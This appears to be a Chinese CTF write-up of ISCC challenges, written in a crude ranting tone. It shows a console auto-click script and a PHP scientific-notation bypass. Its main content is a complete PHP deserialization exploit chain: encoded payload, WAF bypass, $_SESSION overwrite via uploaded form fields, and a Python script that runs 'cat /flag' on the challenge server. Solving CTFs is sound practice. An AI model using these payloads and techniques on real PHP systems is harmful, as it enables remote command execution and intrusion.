我以后再打 ISCC 我是 SB

咦,没以后了,那就好

本来以为今年能有点长进,结果还是这样,建议以后改名 PYCC,md 这风气就是这么一年年搞坏的

反正是 PY ,全栈都拿不到奖,不定期更新

Misc 不更新了,没啥意思(其实是不会区块链……)


一、练武:

1.ISCC客服冲冲冲(一):

签到题,理论上有三种做法

有个 function.js,混淆的 js 代码,所以第一种做法应该是解混淆?

后面两种其实可以算作一种,利用控制台

打开后自动 Debug 了,其实可以连点

百度一搜一大堆

setInterval(function(){document.getElementById("left_button").click();},1);

当然还可以在 Console 里搜一下,有个 votes,直接设置完事

2.这是啥:

这是啥?这是啥 B,氼🐎招新赛都不出这种题了

3.Web01:

这题也是个 2B 题

robots.txt 告诉我 /src/code/code.txt 这个路径,但是源码在 /code/code.txt

<?php
if (isset ($_GET['password'])) {
     
	if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
	{
		echo '<p>You password must be alphanumeric</p>';
	
    }
	  else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
	{    
    
		if (strpos ($_GET['password'], '*-*') !== FALSE)
		{
			die('Flag: ' . $flag);
		}
		else
		{
			echo('<p>*-* have not been found</p>');
		}
	}
	else
	{
		echo '<p>Invalid password</p>';
	}
}
?>

不用动脑子,直接科学计数法绕过

4.登陆:

md 我最想骂的就是这个题,不会出题就不要出好🐎?

首先一开始那个 admin 竟然能 123456 弱密码进去,我真是 tmd 服了,QQ 和手机号在那挂着,👴以为要社工,后台那个图片转个码就是 flag

然后还有个 /www.zip,下载下来一看是用的 0CTF 的 piapiapia,改都不带改的,真是服了

5.which is the true iscc:

这题还算有点脑子的

源码审计:

<?php

session_start();
ini_set('max_execution_time', '5');
set_time_limit(5);

$status = "new";
$cmd = "whoami";
$is_upload = false;
$is_unser_finished = false;
$iscc_file = NULL;

class ISCC_Upload {

    function __wakeup() {
        global $cmd;
        global $is_upload;
        $cmd = "whoami";
        $_SESSION['name'] = randstr(14);
        $is_upload = (count($_FILES) > 0);
    }

    function __destruct() {
        global $is_upload;
        global $status;
        global $iscc_file;
        $status = "upload_fail";
        if ($is_upload) {

            foreach ($_FILES as $key => $value)
                $GLOBALS[$key] = $value;
        
            if(is_uploaded_file($iscc_file['tmp_name'])) {
                
                $check = @getimagesize($iscc_file["tmp_name"]);
                
                if($check !== false) {

                    $target_dir = "/var/tmp/";
                    $target_file = $target_dir . randstr(10);

                    if (file_exists($target_file)) {
                        echo "想啥呢?有东西了……<br>";
                        finalize();
                        exit;
                    }

                    if ($iscc_file["size"] > 500000) {
                        echo "东西塞不进去~<br>";
                        finalize();
                        exit;
                    }

                    if (move_uploaded_file($iscc_file["tmp_name"], $target_file)) {
                        echo "我拿到了!<br>";
                        $iscc_file = $target_file;
                        $status = "upload_ok";
                    } else {
                        echo "拿不到:(<br>";
                        finalize();
                        exit;
                    }

                } else {
                    finalize();
                    exit;
                }
                
            } else {
                echo "你真是个天才!<br>";
                finalize();
                exit;
            }
        }
    }
}

class ISCC_ResetCMD {

    protected $new_cmd = "echo '新新世界,发号施令!'";

    function __wakeup() {
        global $cmd;
        global $is_upload;
        global $status;
        $_SESSION['name'] = randstr(14);
        $is_upload = false;

        if(!isset($this->new_cmd)) {
            $status = "error";
            $error = "你这罐子是空的!";
            throw new Exception($error);   
        }

        if(!is_string($this->new_cmd)) {
            $status = "error";
            $error = '东西都没给对!';
            throw new Exception($error);
        }
    }

    function __destruct() {
        global $cmd;
        global $status;
        $status = "reset";
        if($_SESSION['name'] === 'isccIsCciScc1scc') {
            $cmd = $this->new_cmd;
        }
    }

}

class ISCC_Login {

    function __wakeup() {
        $this->login();
    }

    function __destruct() {
        $this->logout();
    }

    function login() {
        $flag = file_get_contents("/flag");
        $pAssM0rd = hash("sha256", $flag);
        if($_GET['pAssM0rd'] === $pAssM0rd)
            $_SESSION['name'] = "isccIsCciScc1scc";
    }

    function logout() {
        global $status;
        unset($_SESSION['name']);
        $status = "finish";
    }

}

class ISCC_TellMeTruth {

    function __wakeup() {
        if(!isset($_SESSION['name'])) 
            $_SESSION['name'] = randstr(14);
        echo "似乎这个 ".$_SESSION['name']." 是真相<br>";
    }

    function __destruct() {
        echo "似乎这个 ".$_SESSION['name']." 是真相<br>";
    }

}

class ISCC_Command {

    function __wakeup() {
        global $cmd;
        global $is_upload;
        $_SESSION['name'] = randstr(14);
        $is_upload = false;
        $cmd = "whoami";
    }

    function __toString() {
        global $cmd;
        return "看看你干的好事: {$cmd} <br>";
    }

    function __destruct() {
        global $cmd;
        global $status;
        global $is_unser_finished;
        $status = "cmd";
        if($is_unser_finished === true) {
            echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";
            echo "<span style='color:blue'>";
            @system($cmd);
            echo "</span>";
        }
    }

}

function randstr($len)
{
    $characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_=';
    $randstring = '';
    for ($i = 0; $i < $len; $i++) {
        $randstring .= $characters[rand(0, strlen($characters))];
    }
    return $randstring;
}

function waf($s) {
    if(stripos($s, "*") !== FALSE)
        return false;
    return true;
}

function finalize() {
    $cmd = "";
    $is_upload = false;
    unset($_SESSION);
    @unlink($iscc_file);
    $status = "finish";
    echo "<img src='whichisthetrueiscc.gif'><br>";
}


if(isset($_GET['whatareyounongshane'])) {
    $whatareyounongshane = $_GET['whatareyounongshane'];
    switch ($whatareyounongshane) {
        case "src":
            highlight_file(__FILE__);
            break;
        case "cmd":
            echo "想越级干好事?还是有门的……";
            header('Location: /?%3f=O:12:"ISCC_Command":0:{}');
            break;
        case "reset":
            echo "几辈子积累的好运就在这时~:p";
            header('Location: /?%3f=O:13:"ISCC_ResetCMD":1:{}');
            break;
        case "upload":
            $resp = <<<EOF
<form action="/index.php?%3f=O:11:%22ISCC_Upload%22:0:{}" method="post" enctype="multipart/form-data">
  <input type="file" name="iscc_file">
  <input type="submit" value="Upload Image" name="submit">
</form>
EOF;
            echo $resp;
            break;
        case "tellmetruth":
            echo base64_decode("PGltZyBzcmM9J3RlbGxtZXRydXRoLmdpZic+Cg==");
            header('Location: /?%3f=O:14:"ISCC_TellMeTruth":0:{}');
            break;
        default:
            echo "空空如也就是我!";
    }
    finalize();
    die("所以哪个ISCC是真的?<br>");
}

if(isset($_GET['?'])) {
    
    $wtf = waf($_GET{'?'}) ? $_GET['?'] : (finalize() && die("试试就“逝世”!"));
    
    if($goodshit = @unserialize($wtf)) {
        $is_unser_finished = true;
    }

    if(in_array($status, array('new', 'cmd', 'upload_ok', 'upload_fail', 'reset'), true))
        finalize();
    die("所以哪个ISCC是真的?<br>");
}

?>

主逻辑在 ISCC_Command 里的 __destruct()

function __destruct() {
        global $cmd;
        global $status;
        global $is_unser_finished;
        $status = "cmd";
        if($is_unser_finished === true) {
            echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";
            echo "<span style='color:blue'>";
            @system($cmd);
            echo "</span>";
        }
    }

找一下 $cmd,在 ISCC_ResetCMD 里的 __destruct() 里有

function __destruct() {
        global $cmd;
        global $status;
        $status = "reset";
        if($_SESSION['name'] === 'isccIsCciScc1scc') {
            $cmd = $this->new_cmd;
        }
    }

主要就是这个 $_SESSION['name'],再看,发现在 ISCC_Login 里有个东西

function login() {
        $flag = file_get_contents("/flag");
        $pAssM0rd = hash("sha256", $flag);
        if($_GET['pAssM0rd'] === $pAssM0rd)
            $_SESSION['name'] = "isccIsCciScc1scc";
    }

但这是个坑,这玩意明显不能通过 login() 整出来,那在哪嘞

在 ISCC_Upload 的 __destruct()

foreach ($_FILES as $key => $value)
                $GLOBALS[$key] = $value;

所以上传图片的时候,顺带着传个 text 就可以,覆盖一下

类似这种东西

Content-Disposition: form-data; name="_SESSION"; filename="isccIsCciScc1scc"
Content-Type: text/plain

1ndweb

再说序列化顺序

其实分析下来也知道一共就用到 3 个类,所以直接这样:

ISCC_Upload() => ISCC_ResetCMD() => ISCC_Command()

然后有个 waf()

直接大写 S + 16 进制绕过

<?php

class ISCC_Upload {
	public $status;
}

class ISCC_Command {

}

class ISCC_ResetCMD {
    public $cmd;
    public $status;
    protected $new_cmd = "cat /flag";


}


$a = new ISCC_Upload();
$a->status = new ISCC_ResetCMD();
$a->status->cmd = new ISCC_Command();
$b = serialize($a);
echo urlencode($b);


//
最后的?%3F=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D

写个脚本就行,跑一下

import requests

targeturl="http://39.96.91.106:7050/"

files={
    'iscc_file':("b",open("1.jpg","rb")),
    "_SESSION":("isccIsCciScc1scc","1ndweb")
}

headers={
    'Cookie':"PHPSESSID=fe2967c292ff6fcc72f8c2b73970fb2f"
}

r=requests.post(url=targeturl+"?%3F=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D",files=files,headers=headers)

print(r.text)

二、擂台赛:

1.tornado:

啥B,拿 18 年护网杯的题目来混,既然这样👴拿国外的 CTF 题目放上来岂不是更好?反正都没几个人打,百度还搜不到


0 条评论

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

Copy Protected by Chetan's WP-Copyprotect.